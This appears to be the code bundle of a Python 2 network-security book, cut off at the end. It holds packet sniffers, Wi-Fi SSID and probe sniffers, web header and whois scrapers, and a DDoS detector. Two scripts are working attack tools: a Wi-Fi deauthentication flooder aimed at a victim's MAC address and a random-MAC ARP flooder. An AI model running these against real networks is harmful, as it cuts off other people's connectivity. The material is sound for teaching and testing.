7 | pkt = s.recvfrom(2048)
8 | ethhead = pkt[0][0:14]
9 | print pkt[0]
10 | eth = struct.unpack("!6s6s2s",ethhead)
11 | print "--------Ethernet Frame--------"
12 | print "desination mac",binascii.hexlify(eth[0])
13 | print "Source mac",binascii.hexlify(eth[1])
14 | binascii.hexlify(eth[2])
15 |
16 | ipheader = pkt[0][14:34]
17 | ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
18 | print "-----------IP------------------"
19 | print "TTL :", ip_hdr[1]
20 | print "Source IP", socket.inet_ntoa(ip_hdr[3])
21 | print "Destination IP", socket.inet_ntoa(ip_hdr[4])
22 | print "---------TCP----------"
23 | tcpheader = pkt[0][34:54]
24 | #tcp_hdr = struct.unpack("!HH16s",tcpheader)
25 | tcp_hdr = struct.unpack("!HH9ss6s",tcpheader)
26 | print "Source Port ", tcp_hdr[0]
27 | print "Destination port ", tcp_hdr[1]
28 | print "Flag ",binascii.hexlify(tcp_hdr[3])
29 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/str1.py:
--------------------------------------------------------------------------------
1 | import struct
2 | ms= struct.pack('hhl', 1, 2, 3)
3 | print (ms)
4 | k= struct.unpack('hhl',ms)
5 | print k
6 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/struct1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 |
4 | host = "192.168.0.1"
5 | port = 12347
6 |
7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
8 | s.bind((host, port))
9 | s.listen(1)
10 | conn, addr = s.accept()
11 | print "connected by", addr
12 |
13 | msz= struct.pack('hhl', 1, 2, 3)
14 |
15 | conn.send(msz)
16 | conn.close()
--------------------------------------------------------------------------------
/Module 2/Chapter 4/Chapter 4/deauth.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | import sys
3 |
4 | interface = "mon0"
5 | BSSID = raw_input("Enter the MAC of AP ")
6 | victim_mac = raw_input("Enter the MAC of Victim ")
7 |
8 | frame= RadioTap()/ Dot11(addr1=victim_mac,addr2=BSSID, addr3=BSSID)/ Dot11Deauth()
9 | sendp(frame,iface=interface, count= 1000, inter= .1)
10 |
--------------------------------------------------------------------------------
/Module 2/Chapter 4/Chapter 4/first_ssid_sniffer.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import sys, os, signal
3 | sniff = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 3)
4 | sniff.bind(("mon0", 0x0003))
5 | ap_list =[]
6 | while True :
7 | fm1 = sniff.recvfrom(6000)
8 | fm= fm1[0]
9 | if fm[26] == "\x80" :
10 | if fm[36:42] not in ap_list:
11 | ap_list.append(fm[36:42])
12 | a = ord(fm[63])
13 | print "SSID -> ",fm[64:64 +a],"-- BSSID -> ", \
14 | fm[36:42].encode('hex'),"-- Channel -> ", ord(fm[64 +a+12])
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Module 2/Chapter 4/Chapter 4/mac_d.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | interface = 'mon0'
3 | i=1
4 | def info(fm):
5 | if fm.haslayer(Dot11):
6 | if ((fm.type == 0) & (fm.subtype==12)):
7 | global i
8 | print "Deauth detected ", i
9 | i=i+1
10 |
11 | sniff(iface=interface,prn=info)
12 |
--------------------------------------------------------------------------------
/Module 2/Chapter 4/Chapter 4/mac_flood.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | num = int(raw_input("Enter the number of packets "))
3 | interface = raw_input("Enter the Interface ")
4 |
5 | arp_pkt=ARP(pdst='192.168.1.255',hwdst="ff:ff:ff:ff:ff:ff")
6 | eth_pkt = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")
7 |
8 | try:
9 | sendp(eth_pkt/arp_pkt,iface=interface,count =num, inter= .001)
10 |
11 | except :
12 | print "Destination Unreachable "
13 |
14 |
15 |
--------------------------------------------------------------------------------
/Module 2/Chapter 4/Chapter 4/probe_req.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | interface ='mon0'
3 | probe_req = []
4 | ap_name = raw_input("Please enter the AP name ")
5 | def probesniff(fm):
6 | if fm.haslayer(Dot11ProbeReq):
7 | client_name = fm.info
8 | if client_name == ap_name :
9 | if fm.addr2 not in probe_req:
10 | print "New Probe Request: ", client_name
11 | print "MAC ", fm.addr2
12 | probe_req.append(fm.addr2)
13 |
14 | sniff(iface= interface,prn=probesniff)
15 |
--------------------------------------------------------------------------------
/Module 2/Chapter 4/Chapter 4/scapy_ssid.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | import struct
3 | interface = 'mon0'
4 | ap_list = []
5 | def info(fm):
6 | if fm.haslayer(Dot11):
7 | if ((fm.type == 0) & (fm.subtype==8)):
8 | if fm.addr2 not in ap_list:
9 | ap_list.append(fm.addr2)
10 | print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2, \
11 | "-- Channel--> ", ord(fm[Dot11Elt:3].info)
12 |
13 | sniff(iface=interface,prn=info)
14 |
--------------------------------------------------------------------------------
/Module 2/Chapter 4/Chapter 4/ssid.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | interface = 'mon0'
3 | ap_list = []
4 | def info(fm):
5 | if fm.haslayer(Dot11):
6 |
7 | if ((fm.type == 0) & (fm.subtype==8)):
8 | if fm.addr2 not in ap_list:
9 | ap_list.append(fm.addr2)
10 | print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2
11 |
12 | sniff(iface=interface,prn=info)
13 |
--------------------------------------------------------------------------------
/Module 2/Chapter 5/Programs/banner.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
5 | while True:
6 |
7 | pkt = s.recvfrom(2048)
8 | banner = pkt[0][54:533]
9 | print banner
10 | print "--"*40
11 |
12 |
--------------------------------------------------------------------------------
/Module 2/Chapter 5/Programs/div.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | from bs4 import BeautifulSoup
3 | url = "https://www.hackthissite.org"
4 | ht= urllib.urlopen(url)
5 | html_page = ht.read()
6 | b_object = BeautifulSoup(html_page)
7 | data = b_object.find('div', id ='notice')
8 | print data
--------------------------------------------------------------------------------
/Module 2/Chapter 5/Programs/header.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | url1 = raw_input("Enter the URL ")
3 | http_r = urllib.urlopen(url1)
4 | if http_r.code == 200:
5 | print http_r.headers
--------------------------------------------------------------------------------
/Module 2/Chapter 5/Programs/info.py:
--------------------------------------------------------------------------------
1 | import re
2 | import random
3 | import urllib
4 | url1 = raw_input("Enter the URL ")
5 | u = chr(random.randint(97,122))
6 | url2 = url1+u
7 | http_r = urllib.urlopen(url2)
8 |
9 | content= http_r.read()
10 | flag =0
11 | i=0
12 | list1 = []
13 | a_tag = "<*address>"
14 | file_text = open("result.txt",'a')
15 |
16 | while flag ==0:
17 |
18 | if http_r.code == 404:
19 | file_text.write("--------------")
20 | file_text.write(url1)
21 | file_text.write("--------------\n")
22 | file_text.write(content)
23 | print content
24 |
25 | for match in re.finditer(a_tag,content):
26 | i=i+1
27 | s= match.start()
28 | e= match.end()
29 | list1.append(s)
30 | list1.append(e)
31 | if (i>0):
32 | print "Coding is not good"
33 | if len(list1)>0:
34 | a= list1[1]
35 | b= list1[2]
36 | print content[a:b]
37 | else:
38 | print "error handling seems ok"
39 | flag =1
40 | elif http_r.code == 200:
41 | print "Web page is using custome Error page"
42 | break
43 |
44 |
45 |
46 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/Module 2/Chapter 5/Programs/par3.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | from bs4 import BeautifulSoup
3 | url = raw_input("Enter the URL ")
4 | ht= urllib.urlopen(url)
5 | html_page = ht.read()
6 | b_object = BeautifulSoup(html_page)
7 | print b_object.title
8 | print b_object.title.text
9 | for link in b_object.find_all('a'):
10 | print(link.get('href'))
11 |
12 |
--------------------------------------------------------------------------------
/Module 2/Chapter 5/Programs/whois.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | from bs4 import BeautifulSoup
3 | import re
4 | domain=raw_input("Enter the domain name ")
5 | url = "http://smartwhois.com/whois/"+str(domain)
6 | ht= urllib.urlopen(url)
7 | html_page = ht.read()
8 | b_object = BeautifulSoup(html_page)
9 | file_text= open("who.txt",'a')
10 | who_is = b_object.body.find('div',attrs={'class' : 'whois'})
11 | who_is1=str(who_is)
12 |
13 | for match in re.finditer("Domain Name:",who_is1):
14 | s= match.start()
15 |
16 |
17 | lines_raw = who_is1[s:]
18 | lines = lines_raw.split("
",150)
19 | i=0
20 | for line in lines :
21 | file_text.writelines(line)
22 | file_text.writelines("\n")
23 | print line
24 | i=i+1
25 | if i==17 :
26 | break
27 | file_text.writelines("-"*50)
28 | file_text.writelines("\n")
29 | file_text.close()
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Module 2/Chapter 6/Programs/DDOS_detect1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | from datetime import datetime
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
5 | dict = {}
6 | file_txt = open("dos.txt",'a')
7 | file_txt.writelines("**********")
8 | t1= str(datetime.now())
9 | file_txt.writelines(t1)
10 | file_txt.writelines("**********")
11 | file_txt.writelines("\n")
12 | print "Detection Start ......."
13 | D_val =10
14 | D_val1 = D_val+10
15 | while True:
16 |
17 | pkt = s.recvfrom(2048)
18 | ipheader = pkt[0][14:34]
19 | ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
20 | IP = socket.inet_ntoa(ip_hdr[3])
21 | print "Source IP", IP
22 | if dict.has_key(IP):
23 | dict[IP]=dict[IP]+1
24 | print dict[IP]
25 | if(dict[IP]>D_val) and (dict[IP]
2 |
3 |
4 |
5 |
6 |
7 |
THis is Comment page
Enter your views
mohit
LOGOUT
8 |
9 |
10 |
11 |
12 | Leave your Comments
13 |
14 |